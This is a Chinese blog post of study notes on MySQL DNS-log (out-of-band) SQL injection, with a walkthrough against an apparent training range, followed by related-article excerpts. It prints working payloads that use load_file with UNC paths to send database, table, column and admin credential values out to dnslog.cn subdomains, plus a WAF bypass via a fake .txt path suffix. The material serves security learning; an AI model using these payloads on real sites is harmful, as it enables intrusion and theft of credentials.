MySQL_DNS注入

最新推荐文章于 2022-08-07 21:23:08 发布
最新推荐文章于 2022-08-07 21:23:08 发布
阅读量164 收藏
点赞数
分类专栏: 学习笔记 文章标签: mysql 数据库 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46140380/article/details/120145683
版权

一、DNSLOG的使用场景

DNS log 【DNS日志注入】
DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求

日志 => 日记 - 记录操作、记录访问的文件
DNS日志 => 某时某分谁谁谁请求我查某某域名
如果我们搭建一个DNS服务器来承接域名解析。所有的访问域名都会被我们的日志记录下来
域名 => 由运营商解析。 修改域名的设置方法,强行执行某个Ip去解析域名 NS记录
固定的域名 由固定的DNS服务器解析

DNS注入的核心,将盲注转化为显错注入

请添加图片描述
DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求
比如 xx.qq.com => DNS记录了这个请求,
那么我们也可以让mysql也能发出请求,DNS也会记录

二、DNSLOG的函数解析

LOAD_FILE函数:

请添加图片描述
在使用load_file时,目标mysql数据库配置文件(my.ini)需要有这个参数:secure_file_priv,否则的话无非使用。
MYSQL数据导出与导入 :secure_file_priv参数说明,这个参数用来限制数据导入和导出操作的效果
查看数据库版本: select version();
请添加图片描述
LOAD_FILE() 读取文件
文件路径是字符串:需要使用单引号'或者双引号"
路径的写法:
\转义字符 => \\
/

绝对路径:

1.使用\读取文件时,因为本身是转义字符,所以需要写\\表示
请添加图片描述
2.使用/直接读取
请添加图片描述

相对路径:

写相对路径的时候,不知道渗透目标的环境到底有多少个文件夹可以多写一点../上级目录
请添加图片描述

UNC路径:

请添加图片描述
在这里插入图片描述
http://dnslog.cn/ 免费的dnslog平台 不用注册 不用登陆 不采集任何信息 [美滋滋]
在这里插入图片描述

DNS平台:

既然得到之后,我们就来用这个DNS服务器来获取一下域名解析的数据
1.复制刚刚得到的dns服务器。前面跟你想要解析的东西,这里我就写的yq
没有什么特别的意思,得到的回显也是zkaq,但是把zkaq换成 database() 那么就会回显使用的数据库名
请添加图片描述

请添加图片描述
点击refresh 就可以得到解析的数据,前面的zkaq也得到了回显,这里我就写的zkaq
没有什么特别的意思,得到的回显也是zkaq,但是把zkaq换成 database() 那么就会回显使用的数据库名
请添加图片描述

进入当前数据库为:mysql

1.利用DNSlog平台获取到当前数据库

select load_file(concat("//",(select database()),".fza4p5.dnslog.cn/abc"));请添加图片描述
请添加图片描述

2.利用DNSlog平台获取到表名:

select load_file(concat("//",(select table_name from information_schema.tables where table_schema=database() limit 0,1),".vkw8iq.dnslog.cn/abc"))
请添加图片描述
获取到的表名和数据库的表名成功对应:
请添加图片描述
专业术语:obb => 数据外带
弱点:1、目标得有网络 2、SMB服务 windows自带,linux他并不自带。
DNS注入可以用于Linux吗? (不一定可以!)

三、DNSLOG靶场讲解

waf : 网站的安全软件
计算机中: 黑白名单
黑名单: 名单上的人不能XXXX
白名单: 只有名单上的人可以XXX

为了更加的稳定、为了节约性能
1.安全 其实是一个妥协平衡的产物
2.不要网站干扰正常使用
3.装了之后不要影响性能,因为不影响网站性能,所有waf会有白名单

例如一些常见的白名单
1.txt?id=1 对txt传参
1.jpg?id=1 对图片传参
waf: txt jpg 后缀为什么要检测,不会对网站造成伤害,觉得他是安全的
在这里插入图片描述
http://59.63.200.79:8014/index3.php/1.txt?id=1 and 1=1
WEB容器的特性:
apache 他会对index3.php/1.txt
请求的文件不存在他会自动请求前一个
Apache是从右往左,并且不存在的东西它会跳过,就比如说读取到1.txt,就直接跳过,去读取index3.php,存在就执行
而waf,也就是安全狗,她会过滤很多东西,比如php格式。
但是像txt,jpg这些它认为是安全的,不会去过滤。

成功访问,利用txt格式的文件进行传参绕过安全狗!
请添加图片描述
搭配load_file进行数据获取:
在这里插入图片描述

现在开始进行实战:

先提醒一下,前面的测试是在本机上测试的,所以是 select 开头,
但是实战这已经有select开头了,我们就不要自己加了
txt的名字和传参的id随便写,没有影响,这里我写的1.txt和id=1

1.获取当前数据库

59.63.200.79:8014/index3.php/1.txt?id=1 and load_file(concat("//",(select database()),".0tzz89.dnslog.cn/abc"))
请添加图片描述
成功获取数据库名:mangzhu
请添加图片描述
接下来就是和显错注入一样的思路.

2.获取表名

这里特别要注意一点的是,一个dns服务器如果已经记录了一个东西,你在去执行相同的东西,这个已经被记录的东西就不会再显示了,如果遇到这种情况,就马上获取一个新的dns服务器。
1.txt?id=1 and load_file(concat("//",(select table_name from information_schema.tables where table_schema=database() limit 0,1),".xn2m1f.dnslog.cn/abc"))
请添加图片描述
获取到表名admin
请添加图片描述

3.获取字段名

1.txt?id=1 and load_file(concat("//",(select column_name from information_schema.columns where table_schema=database() and table_name="admin" limit 0,1),".dk3o07.dnslog.cn/abc"))
请添加图片描述获取到字段名:id username password
请添加图片描述

4.获取字段值

1.txt?id=1 and load_file(concat("//",(select username from admin limit 0,1),".kngrr7.dnslog.cn/abc"))
请添加图片描述
请添加图片描述1.txt?id=1 and load_file(concat("//",(select password from admin limit 0,1),".psc7kp.dnslog.cn/abc"))

成功获取flag
请添加图片描述
请添加图片描述

Mr.Huang__
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL-DNS注入
weixin_45634365的博客
03-03 281
一、DNS注入的原理 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,将盲注变为显错注入 即读取远程共享文件,拼接出函数,进行查询,再拼接到域名中,访问时将访问服务器,记录后查看日志 对于sql盲注,常见的方法是使用二分法一个个猜,但是这样的方法很麻烦,还很容易因为数据请求频繁导致被禁 所以可以将查询到的数据发送给一个URL,利用DNS解析产生的记录日志
DNS_LOG注入
学习、分享、交流
05-19 1597
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···
mysql——DNS注入
qq_45300786的博客
08-09 1765
DNS log 【DNS日志注入DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 DNS注入的核心,将盲注转化为显错注入 DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 比如 ox.qidao.com => DNS记录了这个请求, 那么我们也可以让mysql也能发出请求,DNS也会记录 ...
MYSQL--Dns注入
qq_68233961的博客
08-07 1107
MYSQL--Dns注入
16、Mysql - dns注入
songling515010475的专栏
05-22 175
为什么load_file能执行? 因为在mysql配置文件里开启了secure_file_priv服务,导致不对mysql的导入导出不做任何限制。 1.前往dnslog.cn申请一个域名 2.防止被WAF拦截,所以在后面拼接/123.txt?id=123当作参数,因为.txt会被WAF认为txt是不能传参数的,是安全的。申请的域名,前面要加三级域名,后面也要加路径,否则不会生效。 /123.txt?id=123 and load_file(concat('//',(select database
mysql注入dns注入
seek_2022的博客
05-03 2201
文章目录一、DNS-LOG使用(域名解析日志)(一)DNS简介(二)LOG日志是怎么产生的?(三)DNS-LOG在渗透测试中的应用二、DNS注入相关知识回顾(一)load_file() 读取文件(二)UNC路径(三)绕靶场WAF三、DNS注入靶场实战(一)判断SQL注入(一)绕靶场WAF(二)查询库名(三)查询表名(四)查询字段名(五)查询并提交flag四、小结 一、DNS-LOG使用(域名解析日志) (一)DNS简介 DNS(域名解析)是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一
mysql dns 注入_数据库DNSLog外带注入-总结
weixin_29279047的博客
01-19 971
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等将数据带出。of course!这里主讲DNSlog外带注...
sqlmap_dns注入配置方法
KHOST的博客
07-17 775
网上针对sqlmap进行dns注入的相关文章太少,只是简单介绍了下--dns-domain参数,相关的实战文章要么就写的模糊或者一笔带过,搞的云里雾里(主要是菜,关键还没大佬带)。然后自己参考网上的方法自己重新搞了一遍。 0X00 需要准备的东西,sqlmap、windows盲注一个、两个域名、一台外网服务器。 某次搞事情的时候碰到一个时间盲注,碰巧是台windows的,想起dns注入的方法。 在开始前我准备先用sqlmap的--sql-shell 命令进行dns注入payloa..
封神台MYSQL 注入 - Dns注入
qq_40941912的博客
10-05 1159
一、原理 DNSLOG的使用场景: 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 LOAD_FILE()读取文件的函数 读取文件并返回文件内容为字符串。要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。
Mysql注入——DNS注入
m0_55854679的博客
02-17 2058
DNSlog【解决繁琐的盲注】介绍 DNS => 域名解析 LOG => 日志 dns-log => 域名解析日志【记录别人来查询域名和ip的对应】 DNSlog使用场景 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban,所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 DNS
MySQL DNS使用过程详细分析
09-11
mysql 客户端连接 mysql 服务器 (进程为:mysqld),mysqld 会创建一个新的线程来处理该请求。该线程先检查是否主机名在主机名缓存中
远程连接MySQL速度慢的解决方法以及MySQL解析DNS的流程图[附PDF下载]
03-17
mysql使用dns 流程解析 pdf下载 博文链接:https://whitepoplar.iteye.com/blog/561343
mysql-dnslog注入
Adminxe的博客
05-05 1868
@Adminxe http://ceye.io/ //dnslog注入平台 dnslog原理简介: 简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。 对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设...
MySQL注入Dns 注入
hackzkaq的博客
12-03 203
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 DNS注入原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 DNS注入利用的场景 在无法直接利用的情况下,但是可以通过DNS请求,通过DNSlog,把数据外带,用DNS解析记录查看。 DNSLOG的使用场景 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时
数据库注入学习笔记2---MySQL注入DNS注入
qq_41759633的博客
08-07 281
引:DNS注入并不是对DNS服务器进行注入,而是利用DNS解析的时候会留下的有用的日志,简称:DNS log注入。 条件:有SQL盲注(或时间)注入的站点,可是用sqlmap跑需要频繁请求,最后导致ip被ban。 发现疑似命令注入的洞,但是目标站点不显示,无法确认是不是有漏洞 目标不让信息显示出来,如能发送请求,那么就可以尝试咱这个办法----用DNS log来获取回显(一般为root权限) 首先...
mysql dns 注入_DNSlog应用
weixin_36296215的博客
01-27 214
————背景说明————在做渗透的时候,有一些漏洞发现无回显的,比如sql注入,一般当我们拿到一个无回显的注入,那么我们往往会采用盲注,使用二分法不断猜测字符等方式来取信息,不过这样的方式耗时又费力,而且频繁地测试容易被目标网站ban掉。那么面对盲注,或者是其他漏洞的盲打,有没有哪种方法,可以快速地获取我们需要的信息呢,答案是有的,即本篇主要说的,利用DNS快速获取数据,官方地讲即DNSlog。这...
mysql dns 注入_SQL注入-DNS注入(二)
weixin_36125719的博客
01-27 198
其实就是盲注的简化版本,不过这种方式确实简单,不需要写py脚本一点点去跑参考文章:0x01、关于DNSlog在Web攻击的利用DNSlog在Web漏洞利用中已经是老生常谈的问题,简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。0x02、常用在哪些情况下SQL注入中的盲注无回显的命令执行无回显的SSRF0x03、Dns...
五、数据库注入(3)Mysql注入——DNS注入
weixin_45540609的博客
04-20 231
在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候可以通过DNS请求吧想获得的数据外带出来。 对于sql盲注,常见方法是用二分法去猜,但是这样很麻烦,还容易因为数据请求过于频繁导致被ban。 所以可以把select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 DNS-LOG:DNS服务器的解析记录 DNSLOG函数解析 1、LOAD_FILE() 读取文件函数,是数据库函数 读取文件并且返回文件内容是字符串,使用该函数,文件必须位...
DNS中的SQL注入攻击
netsec_steven的博客
10-09 1939
0x00 前言 原文地址:http://arxiv.org/ftp/arxiv/papers/1303/1303.3047.pdf 原文作者: Miroslav tampar 本文描述了一种利用DNS解析过程获取恶意SQL查询结果的先进的SQL注入技术。带有sql查询结果的DNS请求最终被攻击者控制的远程域名服务器拦截并提取出宝贵的数据。 开源SQL注入工具—SqlMap现在已
SQL注入攻击详解与防御策略
- DNS注入:利用DNS查询延迟来获取信息。 四、MySQL中的函数与查询 了解MySQL中的函数和表对于进行SQL注入至关重要。例如,`SELECT`函数用于查询数据,`UNION`用于合并多个查询结果,而默认表如`information_schema...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值